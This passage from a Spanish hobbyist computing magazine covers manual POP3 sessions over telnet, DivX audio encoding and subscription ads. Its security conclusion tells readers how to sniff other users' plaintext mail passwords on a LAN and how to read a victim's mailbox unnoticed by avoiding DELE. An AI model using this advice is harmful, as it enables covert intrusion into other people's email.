            que te lo deje activo. Si en lugar de utilizar el    opción POP CLIENT SETTINGS


Página 12                                                                                           PC PASO A PASO Nº 7
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




                                                           escribir desde una consola (shell de Linux/Unix,
                                                           o ventana MS-DOS en Windows) lo siguiente:

                                                           telnet pop.bonbon.net 110

                                                           Con esto se nos abrirá una aplicación de Telnet
                                                           que conectará automáticamente con el servidor
                                                           de correo, en el puerto de POP3.


                                                               !             Sí ya tenemos...

                                                               Si ya tenemos el TELNET abierto (y nosotros lo tenemos
                                                               activo desde el punto 1.1 de este artículo, ¿recuerdas?
                                                               Donde te advertimos que NO CERRASES la ventana
          Con lo que obtendremos los datos necesarios          TELNET), entonces, en lugar de utilizar la anterior
          para poder acceder a nuestra cuenta.                 instrucción simplemente escribiremos "o pop.bonbon.net
                                                               110" (sin comillas) y pulsaremos enter. El resultado será
                                                               idéntico.




          Estos son los datos con los que configurarías        -- o es el comando OPEN: abrir/establecer conexión
          tu Cliente de Correo (por ejemplo el Outlook)        -- pop.bonbon.net es el nombre de dominio donde hemos
          y que nosotros utilizaremos para ejercitarnos        creado la cuenta de correo. Ese nombre de dominio
          con el Telnet y entender qué es lo que ocurre        corresponde a una IP y esa IP corresponde a un PC dónde
          cada vez que nos bajamos el correo :)                hay un programa (servidor de mail) que atiende las peticiones
                                                               al puerto 110. Si no te queda claro, leete de nuevo el número
          2.1. ESTABLECIMIENTO DE LA CONEXIÓN                  uno de hack x crack, en concreto el curso de TCP/IP… por
          Mirando la pantalla anterior, podemos ver que        cierto, recuerda que el número uno puedes bajártelo GRATIS
          el nombre del servidor POP3 es                       de nuestra Web en formato PDF o pedirlo por correo -->
          popbonbon.net. Tenemos que abrir una                 www.hackxcrack.com
          conexión con ese servidor en el puerto 110,
          que es el puerto de POP3, para lo cual podemos

PC PASO A PASO Nº 7                                                                                              Página 13
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




                                                                 nuestro cliente de Telnet no tiene eco local,
  -- 110 es el puerto que escucha el Servidor de Correo          es conveniente que lo activemos antes de
  Remoto. Si te intentases conectar en otro puerto, o no se      escribir nada, ya que si no no podremos ver el
  establecería la conexión o estarías conectándote a otro tipo   texto que escribimos nosotros mismos. Esto
  de servicio (puerto 80 para Servidor Web, puerto 21 para       ya lo dijimos al principio de este artículo y es
  servidor FTP… tienes una buena lista en el número 6 de         MUY IMPORTANTE. Aquí tienes como ejemplo
  PC PASO A PASO).                                               el cliente de Telnet de Windows 9x, donde el
                                                                 eco local se activa en la opción Preferencias
                                                                 del menú Terminal.
            Si todo ha ido bien, el servidor nos devolverá
            una respuesta parecida a esta:
            +OK hello from popgate(2.23.11).
            Siempre que la respuesta empiece por +OK es
            que todo ha ido bien. :)
            Siempre que la respuesta empiece por -ERR
            es que algo ha ido mal. :(


  !             A partir de ahora...

  A partir de ahora YA ESTAMOS CONECTADOS al
  Servidor Remoto (en este caso un Servidor POP3). Los
                                                                        Este es el cliente telnet de Windows 9X
  comandos que introduciremos a continuación NO SON
  COMANDOS TELNET, sino comandos de POP3, es decir,              Ya estamos preparados para escribir el primer
  comandos que entenderá el Servidor de Correo.                  comando, que va a ser precisamente el que le
  No hay que confundirse con esto!!! Haciendo una analogía       diga al servidor cual es nuestro nombre de
  entre un teléfono y un TELNET diremos que, para establecer     usuario.
  una comunicación con un teléfono primero hay que               Suponiendo que nuestro usuario es
  descolgar e introducir un número al que llamar (en TELNET      yosoygenial, escribimos:
  en lugar de un número introducimos un comando, en este         USER yosoygenial --> este es nuestro user,
  caso o pop.bonbon.net 110). Pero una vez establecida la        tu debes poner el tuyo ;p
  comunicación, cuando desde el otro lado una persona            (Por supuesto, todas las líneas se terminan con
  descuelga el auricular, dejamos tranquilo el teclado del       Intro...). Si todo ha ido bien, la respuesta
  teléfono y empezamos a hablar en el idioma adecuado, en        habitual será algo así:
  nuestro caso Español (en TELNET exactamente igual, una         +OK password required.
  vez establecida la conexión con un Servidor Remoto nos         Ahora tenemos que escribir el password que,
  olvidamos de los Comandos Telnet y empezamos a "hablar"        supongamos que es superclave:
  en el lenguaje de nuestro interlocutor, en este caso un        PASS superclave --> esta es nuestra clave,
  Servidor que habla POP3).                                      tu debes poner la tuya ;p
                                                                 Si todo ha ido bien, ¡ya estamos dentro de
                                                                 nuestra cuenta de correo! Llegados a este
            2.2. AUTENTICACIÓN                                   punto, las respuestas del servidor pueden ser
                                                                 muy diferentes, pero tienen que empezar
            Lo primero de todo es identificarnos con nuestro     siempre por +OK, ya que si algo ha salido mal
            nombre de usuario y nuestro password. Si             en la autenticación, no estaremos en nuestra

Página 14                                                                                            PC PASO A PASO Nº 7
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




          cuenta :(                                          Cerramos el cliente de correo y ahora que ya
                                                             hemos estrenado la cuenta, la cosa será
                                 2.3. LECTURA DE LOS         diferente. Volvemos al Telnet y tras completar
                                 MENSAJES                    la autenticación (después del comando PASS)
                                                             podríamos tener algo como esto:
                                2.3.1. Comando STAT
                                Como decía, una vez          +OK maildrop ready, 2 message (2163 octets)
          dentro de nuestra cuenta, el servidor nos          STAT
          responderá de forma diferente según haya o         +OK 2 (2163)
          no mensajes sin leer en el servidor. En caso
          de que no haya mensajes sin leer, la respuesta     Como vemos, hay dos mensajes, de 2163 bytes
          puede ser algo parecido a esto:                    (octetos).
          +OK maildrop ready, 0 messages (0 octets)          Cuando hay más de un mensaje, podemos ver
          (3885111 6291111)                                  el tamaño individual de cada mensaje con el
          Esto nos diría que hay 0 mensajes.                 comando:
          En realidad, la forma correcta de hacer esto,      LIST
          es mediante el comando:                            Tras esto, obtendríamos una lista de los
                                                             mensajes, con el tamaño de cada uno.
          STAT (introducimos el comando y pulsamos           Si queremos ver el tamaño concreto de un
          enter)                                             mensaje, podemos pasar el número de mensaje
                                                             c o m o a r g u m e n t o a l c o m a n d o L I S T:
          ¿Por qué es más "correcta" esta forma? Porque      LIST 1
          las especificaciones de POP3 no obligan a que      Y nos dará sólo el tamaño del mensaje 1.
          el servidor nos de esta información cada vez
          que conectamos, por lo que la forma de
          asegurarnos es utilizar el comando especificado
          para ello en el protocolo.
          Tras este comando, nos debería responder con
          2 números, el primero de los cuales será el
          numero de mensajes que hay en el servidor
          (en tu cuenta, claro), y el segundo será el
          tamaño en bytes de los mismos. Siguiendo con
          el ejemplo de que no haya mensajes en el
          servidor, esta sería una respuesta:
          +OK 0 0                                            2.3.3. Comando RETR
                                                             Una vez que ya sabemos los mensajes que hay,
                                    2.3.2. Comando           podemos ver el contenido de los mismos. Viendo
                                    LIST                     el tamaño de cada mensaje podemos hacernos
                                    Antes de seguir          una idea de si el mensaje contendrá sólo texto,
                                    vamos a enviarnos        o también un attachment (archivo adjunto). En
                                    un mail a nuestra        caso de que queráis ver un mensaje con
                                    nueva y reluciente       attachment, habría que entrar en el tema de
          cuenta de correos, ya sabes, abre tu Cliente       la decodificación de binarios, y me temo que
          de Correo (Eudora, Messenger, Outlook, Kmail...)   esto se saldría del tema. :-(
          y envíate un par de mails diciendo lo guapo        Así que vamos a ver un simple mensaje de
          que eres y esas cosas).                            texto. Continuando con el ejemplo anterior, 2

PC PASO A PASO Nº 7                                                                                                 Página 15
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




            mensajes de 1283 y 880 bytes, por el tamaño
            deducimos claramente que los mensajes
            contienen sólo texto y, además, muy poco
            texto. ¿Por qué digo que es muy poco texto?
            Porque de esos 956 bytes, la mayoría serán la
            cabecera del mensaje, como veremos ahora.
            Vamos a utilizar el comando RETR para ver el
            contenido completo del mensaje 1, de la
            siguiente manera:
                                                                                    CABECERA
            RETR 1
            Si el mensaje existe, y todo ha ido bien, a
            continuación el servidor nos soltará a pelo el
            contenido completo del mensaje. Si no tenéis
            configurado vuestro cliente de correo para
            que muestre las cabeceras completas, la
            respuesta os sonará a chino, pero si no, lo que
            veréis será exactamente lo que veis cada vez                             MENSAJE
             que recibís un mensaje. Explicar las cabeceras
            si que se sale del espacio disponible para este
            artículo, así que si realmente os interesa podéis   !            El cuerpo...
            investigar por vuestra cuenta. Lo que más nos
            interesará en principio son los 3 típicos campos    El cuerpo del mensaje original contiene dos frases:
            que podemos ver siempre que recibimos un               - Aquí estamos pasando el rato y probando acentos
            email: From (el "supuesto" emisor del                  - Aquí estámos pasándo él ráto y probándo acéntos
            mensaje), To (el destinatario del mensaje), y       Como curiosidad, fíjate que en la Ventana telnet las tildes
            Subject (el asunto del mensaje). Buscando           son sustituidas por símbolos y letras. Si recogieses los
            en el chorizo que compone la cabecera podréis       mails mediante un Cliente de Correo, verías que aparecería
            encontrar esos tres campos sin problemas.           el mensaje original perfectamente construido (con tildes).
                                                                ¿Por qué ocurre esto? ¿Por qué no vemos las tildes en el
                                                                Telnet?
                                                                Como ya hemos ido aprendiendo, todo funciona mediante
                                                                estándares, y el correo electrónico no es diferente. En
                                                                principio un Cliente de Correo solo puede leer
                                                                (entender/interpretar) caractéres ASCII. En la página 58
                                                                del número 3 de Hack x Crack ya os dimos una tabla ASCII,
                                                                puedes comprobar que para una letra acentuada NO EXISTE
                                                                traducción ASCII, por lo tanto, cuando se introduce un
                                                                valor no interpretable mediante ASCII, este es transformado
                                                                (traducido) a lo que podemos llamar un ASCII-Extendido
                                                                (una ASCII ampliado).
                                                                Esta transformación la hace el Cliente de Correo
                                                                directamente y de forma transparente para el usuario.
                                                                Cuando envías en un mail la vocal i acentuada, el Cliente
                                                                (Outlook por ejemplo) ENVIARÁ la cadena "=ED" en
                                                                lugar de "í"… ummm… entonces ¿por qué cuando recibo


Página 16                                                                                          PC PASO A PASO Nº 7
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




                                                                saturada.
  un mail veo la i acentuada? Pues porque Outlook, cuando       2.3.5. Comandos DELE y RSET
  recibe esa cadena, la transforma de nuevo en "í". Es como     Pero, ¿cómo borraba ese dichoso mensaje que
  un traductor automático.                                      me estaba saturando la cuenta? Pues para eso
  Si quisiesemos profundizar en el problema, deberíamos         tenemos el comando DELE, que lo que hace
  hablar del standar MIME (Multipurpose Internet Mail           es precisamente eliminar un mensaje del
  Extensions Encoding), la IETF (Internet Engineering Task      servidor. Este comando es muy importante, ya
  Force), cómo es tratada la cabecera de un mail (en estricto   que el proceso que sigue un cliente de correo
  USA-ASCII), cómo es tratado el mensaje (depende de la         (a no ser que se configure para que actúe de
  codificación especificada en la cabecera) y unas cuantas      otra manera) al recibir el correo es el siguiente:
  cosas más… poco a poco llegaremos :)
                                                                    1- autentificarse para entrar en la cuenta
                                                                (USER y PASS, u otros sistemas de
            2.3.4. Comando TOP                                  autenticación que no puedo explicar por falta
            ¿Y si en lugar de 956 bytes el mensaje ocupa        de espacio, como son APOP y AUTH)
            30000 bytes y aún así queremos ver, por                 2- ver los mensajes que hay en el servidor
            ejemplo, quien nos envía ese mensaje?               (STAT y LIST, y posiblemente otros comandos
            ¿Tenemos que tragarnos los 30KB de mensaje          que tampoco explicaré, como UIDL)
            solo para buscar un dato de la cabecera? Para          3- bajar los mensajes al PC local del usuario
            evitar eso tenemos precisamente el comando          (RETR)
            TOP.                                                   4- borrar los mensajes ya bajados del servidor,
            Este comando nos permite ver sólo las primeras      ya que los tiene ya el usuario en su PC (DELE)
            líneas de un mensaje, sin necesidad de bajar           5- salir de la cuenta (QUIT)
            el mensaje entero. Así, si escribimos:              Por tanto, una vez se hace un RETR de un
            TOP 2 20                                            mensaje, es habitual que queramos liberar el
            El servidor nos mostrará las 20 primeras líneas     espacio en el servidor, ya que ese mensaje ya
            del mensaje número 2. Podremos así ver la           lo hemos leído. Para borrar el mensaje número
            cabecera para hacernos una idea de si nos           3, por ejemplo, haremos:
            interesa o no el resto del mensaje.                 DELE 3
            Este comando me fue muy útil hace años,             Si por cualquier motivo nos arrepentimos de
            cuando utilizaba una cuenta shell con espacio       haber borrado algún mensaje, podemos
            limitado la cual se me saturaba cada vez que        echarnos atrás, siempre y cuando estemos
            alguien me enviaba un archivo adjunto               todavía en la misma sesión, utilizando el
            relativamente grande. Cuando intentaba recibir      siguiente comando:
            mi correo desde la cuenta shell, sólo podía         RSET
            recibir los mensajes que había antes del mensaje    Este comando anulará todos los DELE que se
             grande, ya que al llegar a ese punto daba un       hayan hecho en esa sesión.
            error y no había manera de recibir el resto de      2.3.6. Comando QUIT
            mensajes. Mi única solución, aparte de dar el       Un premio para el que adivine qué hace este
            coñazo al administrador del sistema, era            comando...
            conectarme por Telnet al servidor POP3, ver         La única consideración a tener en cuenta es
            mediante el comando TOP si ese mensaje              que, cuando se cierra la sesión con QUIT, es
            gordo me interesaba, o lo podía borrar              el momento en el que se hacen efectivos los
            directamente, y arreglar el entuerto sin            comandos DELE, por lo que a partir de este
            necesidad de conectarme a mi cuenta shell           momento los mensajes que se hayan borrado
                                                                serán ya irrecuperables.

PC PASO A PASO Nº 7                                                                                                  Página 17
PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3 - PROTOCOLOS - POP3




            2.4. CONCLUSIONES DE SEGURIDAD                         Suponiendo que consiguieseis robar algún
            En POP3 hay básicamente 3 mecanismos                   password por este sistema, o por cualquier
            diferentes de autenticación, de los cuales sólo        otro, y quisieseis ver el correo de la pobre
            he explicado uno por falta de espacio. Este            víctima sin que ésta se entere, está claro que
            mecanismo es el que utiliza los comandos               no podréis hacerlo utilizando un cliente de
            USER y PASS, como hemos visto.                         correo por las buenas, ya que éste borrará los
            Supongo que entre vosotros habrá unos cuantos          mensajes una vez leídos, de tal forma que el
            avispados que se habrán frotado las manos al           usuario legítimo de la cuenta de correo no
            descubrir que los passwords llegan hasta el            podrá leerlos después de que los hayas
            servidor sin ningún                                    "interceptado" tú y eso, aparte de ser una
            tipo de codificación ni encriptación (cosa que         putada, cantaría mucho tras varios días sin
            no ocurre cuando se realiza la autenticación           recibir un sólo mensaje. Una solución a esto
            mediante los comandos APOP o AUTH).                    sería ver el correo tal y como os he explicado,
            En efecto, si vuestro PC está en una red local         utilizando un cliente de Telnet, y escribiendo
            con varios usuarios, e instaláis un sniffer en         vosotros mismos los comandos que os interesen,
            vuestro PC, podréis ver sin ningún problema            es decir, cualquiera menos el comando DELE,
            todos los passwords de correo de los usuarios          que sería el que jodería el invento. Por supuesto,
            que utilicen cuentas con este tipo de                  otra solución sería configurar vuestro cliente
            autenticación. Por supuesto, no sólo podréis           de correo para que no borre los mensajes una
            ver los passwords, si no también el resto de           vez leídos, pero... eso sería menos divertido,
            la sesión POP3, que incluye el contenido de            ¿verdad? ;-)
            todos los mensajes.                                    PyC_LCo (La Corporación)




                   SI TE GUSTA LA INFORMÁTICA.
            SI ESTAS “CABREADO” CON GÜINDOUS ;)
              SI QUIERES PROGRESAR DE VERDAD
                                                                                             Incluye 7 CD’s y 1 DVD
                       PC PASO A PASO                                                        Manual de Instalación.
               SOR TEA CADA MES UN S.O.                                                      Manual de Administracion

            SUSE LINUX PR OFESSION AL 8.1
            SIMPLEMENTE ENVIA LA PALABRA
                   PCCON AL 5099
                            DESDE TU MOVIL
        PRECIO DEL MENSAJE: 0,90€ + IVA. VALIDO PARA (MOVISTAR - VODAFONE Y AMENA)
                                    IVA. VALIDO PARA (MOVISTAR


                     EL PREMIO PUEDE SER CANJEABLE POR UN JUEGO
                         DE PC O CONSOLA QUE NO SUPERELOS 85€
        EL GANADOR SALDRA PUBLICADO AQUÍ 2 NÚMEROS DESPUES DE LA PUBLICACIÓN.



Página 18                                                                                                PC PASO A PASO Nº 7
PASA TUS PROPIAS
                        PELICULAS A DIVX;)
                        PARTE III: EL AUDIO
          En el número 6 de PC PASO A PASO publicamos           será de agradecer si se tiene un sistema dolby
          la PARTE I y II de este artículo, donde              digital de altavoces.
          aprendimos a extraer y comprimir el video.
                                                               Con el mp3 conseguiremos un tamaño de
          A estas alturas ya tenemos en nuestro disco          archivo para el audio muy aceptable, pero con
          duro un archivo de video que contiene la             algo menos de calidad en el sonido, además
          película, pero le falta algo tan importante como     de una gran compatibilidad con la mayoría de
          la imagen: EL SONIDO :)                              los equipos que tengan tus amigos y les vayas
                                                               a dejar la peli. En este caso solamente nos
          I M P O R T A N T E : L o s p r o g ra m a s q u e   quedaremos con sonido en dos canales, derecho
          utilizaremos en este ejercicio estarán disponibles   (R) e izquierdo (L) propios del stereo.
          en nuestra Web (www.hackxcrack.com) y por
          supuesto en la Web oficial de cada programa.         Y por último, comentaremos el ogg que es un
          Y si quieres más, ya sabes, utiliza el eMule (ya     nuevo proyecto que pretende estar a mitad de
          te lo presentamos en el número 6 de PC PASO          camino entre el mp3 y el ac3. Este último
          A PASO).                                             consigue la misma calidad que un mp3 con
                                                               menos bitrate, y por tanto, menor tamaño de
          1.   DECIDIENDO QUE CODEC                            archivo; además se puede configurar para
          DE AUDIO USAR                                        comprimir no solo 2 canales, sino 4 para tener
                                                               más calidad en el audio.
          Lo primero que debemos decidir antes de
          ponernos a hacer el sonido es el formato en               !            Elegiremos AC3...
          el que queremos que esté comprimido. De
          todos es conocido que hay multitud de codecs
                                                                    Elegiremos ac3 para la calidad, mp3 para la compatibilidad,
          de audio, como son mp3, ac3, wma, pcm, ogg,
                                                                    y ogg para tener más calidad que en mp3 ocupando el
          atrac-3 (en MD),…
                                                                    mismo espacio.

          Cada uno tiene sus propias ventajas frente a
          los demás. El sonido de las películas viene por
                                                               2.        EL AC3
          lo general en ac3, y a veces en DVD´s de
          música como el que viene con el último disco         Si queremos emplear este formato deberemos
          de Platero, la pista de audio viene comprimida       sacar la pista de audio en ac3 con el dvd2avi,
          en pcm.                                              como se explicó en la revista 6.

          En este artículo nos vamos a fijar en tres codecs    El ac3 tiene la ventaja de que si no queremos
          para nuestras películas, el ac3, el mp3 y el         modificarlo, podemos dejarlo tal como esta al
          nuevo ogg.                                           sacarlo del dvd. Esto puede ser recomendable
                                                               si tenemos una película de menos de 110
          Con el AC3 podremos conseguir una calidad            minutos que queremos pasar a dos CD´s. El
          muy alta de sonido, a costa de tener que             sonido en ac3 ocupará en torno a los 350
          reservar más espacio para el audio. Además           megas, lo que nos deja 1100 megas para el
          conservaremos los 6 canales de audio, que            video, resultando un bitrate para el video de


PC PASO A PASO Nº 7                                                                                                 Página 19
DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO




            unos 1300. ¿Que supone todo esto?, pues muy       seleccionando en tipo Dolby Digital (Decode to
            sencillo, vas a tener el mejor audio que le       PCM) (.ac3) . Esto hará que el audio se
            puedes poner a la película, y además la calidad   descomprima y pase a pcm al abrir el archivo,
            del video también será excelente.                 lo cual llevará un ratito.

                                                              Una vez terminado nos iremos a la pestaña
  !            El bitrare...                                  OptionsEncode settings… ya que es lo que
                                                              vamos a hacer.
  El bitrate del video acuérdate de calcularlo tal como se
  explicó en el número anterior, que los valores que pongo
  aquí son aproximados.



            Si la película en cuestión dura mas de ese
            tiempo ya empezaremos a tener que racanear
            en bitrate para el video si queremos conservar
            el audio en ac3, pero también podemos
            modificar el ac3 para que ocupe menos, y así
            no tener que bajarle la calidad al video. Para
            ello recomprimiremos el ac3 pero bajándole el
            bitrate para que el tamaño del archivo se         En Data Rate pondremos el bitrate que
            disminuya considerablemente.                      queremos para el nuevo archivo en ac3. Nunca
                                                              menos de 224 kbs. Y el resto de opciones las
            Para manipular el ac3 utilizaremos el Sonic       dejamos por defecto. Le damos a OK y nos
            Foundry Soft Encode.                              disponemos a comprimir el audio pulsando
                                                              sobre el botón de grabar (el circulo rojo). Ya
                                                              solo queda dejarle hacer.


                                                              3.      EL MP3

                                                              Si queremos emplear el mp3 deberemos sacar
                                                              el audio en pcm como se dijo en la revista 6.

                                                              El MP3 es el formato de audio más extendido
                                                              en Internet, con lo cual no creo que tenga que
                                                              hablar mucho sobre él, ya que en google podrás
                                                              encontrar mucha información. De entre todos
                                                              los codecs que hay para comprimir a mp3
                                                              utilizaremos el lame, ya que permite la
                                                              compresión en vbr.

                                                              El sonido en mp3 se puede comprimir
            También necesitaremos mucho, pero que             principalmente en dos formatos, el cbr (constant
            mucho, espacio en disco duro para hacer esto.     bitrate) y en vbr (variable bitrate). El primero
            Le damos a FileOpen y seleccionamos el           hará que toda la pista de audio se comprima
            archivo ac3 que queremos manipular, y             con el mismo bitrate y el segundo hará que el

Página 20                                                                                         PC PASO A PASO Nº 7
DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO




            bitrate se modifique en función de la necesidad,   usaríamos para cbr, pero como vamos a usar
           utilizando más bits para los momentos de            vbr pondremos bitrate de 32, y así marcaremos
           mayor cantidad de sonidos (explosiones, peleas,     cual es el mínimo que debe de usar. En mode
           gritos, …) y menos en donde no se requiera          podremos seleccionar entre mono o los
           (como en los silencios en las conversaciones).      diferentes tipos de stereo, en mi caso prefiero
           Para obtener mejor calidad en el sonido             el stereo normal. El joint stereo sirve para hacer
           emplearemos este último modo.                       que los canales L y R se separen más, lo cual
                                                               en audio extraído de dvd no será de ninguna
           Para comprimir utilizaremos el programa Razor       utilidad. Y por último seleccionaremos la carpeta
           Lame.                                               en la que queremos que se cree el archivo de
                                                               destino.

                                                               Nos pasamos a la carpeta Advanced y en
                                                               Optimization seleccionamos Quality, lo demás
                                                               lo dejamos todo sin marcar. Pasamos a la
                                                               pestaña VBR, donde nos aseguramos de marcar
                                                               la casilla Enable variable bitrate (vbr) . En
                                                               maximun bitrate pondremos el máximo bitrate
                                                               que queremos que use en la compresión, yo
                                                               suelo usar un valor de 224, que hará que la
                                                               mayor parte de la película se quede entre el
                                                               128 y el 192. En quality elegiremos el valor 4,
                                                               aquí indicamos el nivel de relación
                                                               calidad/tiempo que queremos que use, a menor
                                                               valor mejor calidad y más tiempo tardará, y a
           En primer lugar deberemos comprobar que en          mayor valor, menor calidad y tardará algo
           la carpeta options, en la parte de Lame, hay        menos de tiempo. Por supuesto lo que mas va
           una ruta en la cual se especifica el archivo        a influir en la calidad del sonido va a ser el
           Lame.exe, que es el verdadero compresor. Esto       bitrate, pero esto influirá en una pequeña
           se debe a que en realidad la compresión se          medida ya que hará que se utilicen diferentes
           realiza a través de una línea de comando            algoritmos de compresión. Tomamos el valor
           MS-DOS, pero el razorlame nos ayudará a             de 4 por ser el medio-alto. En las opciones de
           configurar el compresor sin necesidad de            la derecha solo marcaremos la de strictly enforce
           aprenderse complicadas sintaxis de DOS.             minimum bitrab que forzará a que el codec
                                                               busque los puntos en los que puede usar un
                                                               bitrate más bajo. Si usaremos el ABR (Average
  !          El razorlame...                                   BitRate-Media BitRate), estaríamos indicando
                                                               el bitrate que queremos que salga de media,
                                                               pero es mejor dejarle hacer y que salga lo que
 El razorlame nos quita la pesada tarea de mirarnos los
                                                               mejor quede según el codec.
 comandos DOS
                                                               En la pestaña Expert lo dejaremos todo sin
                                                               marcar, y en la parte de ATH control dejaremos
           Le damos a OK y nos vamos a las LAME options,       default y en q level pondremos el valor 2.Y en
           que es donde configuramos el codec. En la           la última pestaña, audio processing, no hace
           carpeta general seleccionamos el Bitrate que        falta marcar nada.

PC PASO A PASO Nº 7                                                                                                 Página 21
DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO




            En la parte de debajo de la pantalla podrás
            ver la línea de comandos que habría
            que introducir para hacer la compresión desde
            MS-DOS. Arriba podrás guardar las opciones
            con el nombre que quieras para que en futuras
            ocasiones no más que cargarla para tener las
            opciones configuradas.

            Una vez lo tenemos todo configurado pulsamos
            sobre el botón add y añadimos el archivo
            .wav que contiene el audio de la película y
            que sacamos con el dvd2avi. Ahora solo
            queda darle a encode y mirar durante el
            tiempo que tarde el grafico que indica
            los porcentajes de bitrate que usa. Verás
            que en su mayoría la película estará en
            192.


            4.      EL OGG VORBIS

            Este formato es de los más recientes que
            hay. Es un proyecto en el cual están intentando
            conseguir mejores calidades con bitrates
            mas bajos y poder comprimir varios
            canales. Deberemos haber sacado el audio
            con el dvd2avi en formato ac3.

            Este codec tiene la desventaja de que
            para dejarle a un colega una película
                                                               En primer lugar seleccionaremos en Source File
            tendréis que acompañar el CD con unos archivos
                                                               el archivo de origen, y automáticamente se
            de codecs y de filtros para que lo pueda oír,
                                                               rellenará también la casilla del archivo de
            y que en algunas ocasiones no han llegado a
                                                               destino. En Stream Info podremos ver la
            funcionar del todo, aunque nunca ha
                                                               información sobre el archivo de origen.
            habido problemas con wMe y wXp. A favor del
            codec diré que ha sido utilizado en el reciente
                                                               En destinantion format seleccionaremos Vorbis,
            juego Unreal Tournament 2003, que no me
                                                               ya que estamos pensando en usar el Ogg vorbis.
            negareis que tiene una alta calidad en el audio,
                                                               Elegirmes 2-pass mode, al igual que hicimos
            así como en el video… (Bueno, que me salgo
                                                               con el video, haremos dos pasadas para
            del tema).
                                                               comprimir el audio, con las mejoras que eso
            Lo primero es conseguir el OggDirectShowFilters    conlleva. Lo siguiente es elegir entre dumb,
            y el SubTitDS que nos podemos bajar de la          que utilizará mucho espacio de disco duro para
            página de Tobias o de la página de HackXCrack.     la primera pasada ya que descomprimirá el
            A continuación tendrás que hacerte con el          audio en el disco duro, float, que no usará mas
            HeadAC3he, programa que utilizaremos para          espacio en disco duro de lo que ocupe el archivo
            la compresión a ogg.                               final, o hybrid, que como su nombre indica, es

Página 22                                                                                          PC PASO A PASO Nº 7
DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO




             un híbrido de los anteriores.                   En esta ventana veremos los canales que tiene
                                                             el archivo de origen, y seleccionaremos los
            Star frame y end frame los usaríamos si no       canales que queremos que tenga el de destino.
            quisiésemos comprimir todo el sonido, sino       Pero mejor que ponernos a hacerlo "a pelo",
            solo una parte de él, como por ejemplo, si le    seleccionaremos una de las opciones que
            quitamos los créditos del final a la peli. En    aparece en la casilla Downmix Type. Aquí
            Resimple podríamos cambiar la frecuencia de      tenemos a elegir entre sonido mono, stereo y
            muestreo del audio. Y por último, en Priority,   surround. Yo suelo usar el surround 2, pero lo
            señalamos la prioridad que tendrá el proceso     mejor es probarlo y ver que es lo que mas nos
            de compresión.                                   convence, ya que dependerá del tipo de equipo
                                                             en el que lo vamos a probar, no es lo mismo
                                                             ponerlo con una tarjeta SB128 o una SBAudigy2.
  !            Dejo a tu cargo...                            A la derecha tenemos las opciones del número
                                                             de canales, a elegir entre 2, 4 o 6 canales. Con
                                                             dos canales funciona perfectamente, pero con
  Dejo a tu cargo el que aprendas a seleccionar las partes
                                                             más a veces da fallos. Yo tengo varias películas
  que quieres comprimir en el vdub.
                                                             pasadas a 4 canales, y la verdad es que mejora
                                                             mucho el sonido si lo comparamos con los dos
                                                             míticos del mp3, y además el archivo de destino
            A continuación le damos a Options y aparecerá    no es excesivamente grande.
            una nueva ventana:

                                                                 !           Recordemos siempre...

                                                                Recordemos siempre que el ogg es un proyecto, con lo que
                                                                puede tener fallos en ciertas ocasiones, como en el caso de
                                                                los canales.


                                                             A continuación volveremos a darle al botón
                                                             Options y aparecerá otra pantalla:




PC PASO A PASO Nº 7                                                                                             Página 23
DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO - DIVX - EL AUDIO




                 Aquí elegiremos el bitrate y el modo de                    Volvemos a darle al botón options para que se
                 compresión que queremos que use, CBR, VBR                  quite de en medio la ventanita de las opciones
                 o ABR. Por los mismos motivos que en el mp3,               y le damos a Start para que empiece a
                 seleccionaremos VBR. En Quality marcaremos                 comprimirse la pista de audio al formato ogg.
                 un valor de 3.00. Y por fin, configuraremos el
                 bitrate. El ogg consigue la misma calidad que
                 el mp3 pero con menor bitrate, por
                                                                                !              MUY         I M P O RTA N T E . . .
                 ello, seleccionaremos O para el minimun,
                 112 para el average y 511 para el maximun.                     MUY IMPORTANTE: Para escuchar las películas que
                 Los valores mínimo y máximo podéis                             contiene el audio en ac3 se necesitan los AC3filters, que
                 cambiarlos, por ejemplo a 32 y 224 igual que                   podrás encontrarlos en nuestra Web (www.hackxcrack.com)
                 en el mp3.




                          SUSCRIBETE                                                                     A
                        PC PASO A PASO
                                                                              45 EUROS (10% DE DESCUENTO)
   SUSCRIPCIÓN POR:                                                           +
   1 AÑO                                                      =               SORTEO DE UNA CONSOLA XBOX
                                                                              +
   11 NUMEROS                                                                 SORTEO 2 JUEGOS PC (A ELEGIR)

Contra                        R e e m b o l s o Giro Post al
Solo tienes que enviarnos un mail a preferente@hackxcrack.com              Envíanos un GIRO POSTAL por valor de 45 EUROS a:
indicando:                                                                 CALLE HIGINIO ANGLES Nº2, 4º-1ª
- Nombre                                                                   CP 43001 TARRAGONA
- Apellidos                                                                ESPAÑA
- Dirección Completa                                                       IMPORTANTE: En el TEXTO DEL GIRO escribe un mail de contacto
- Población                                                                o un número de Teléfono.
- Provincia
- Cógigo Postal                                                            Y enviarnos un mail a preferente@hackxcrack.com indicando:
- Mail de Contacto y/o Teléfono Contacto                                   - Nombre
Es imprescindible que nos facilites un mail o teléfono de contacto,        - Apellidos
puesto que 24 horas después de que recibamos tu petición de                - Dirección Completa
subscripción te daremos un número de Cliente Preferente. Este              - Población
número será utilizado para los sorteos.                                    - Provincia
- Tipo de Subscripción: CONTRAREEMBOLSO                                    - Cógigo Postal
- Número de Revista:                                                       - Mail de Contacto y/o Teléfono Contacto
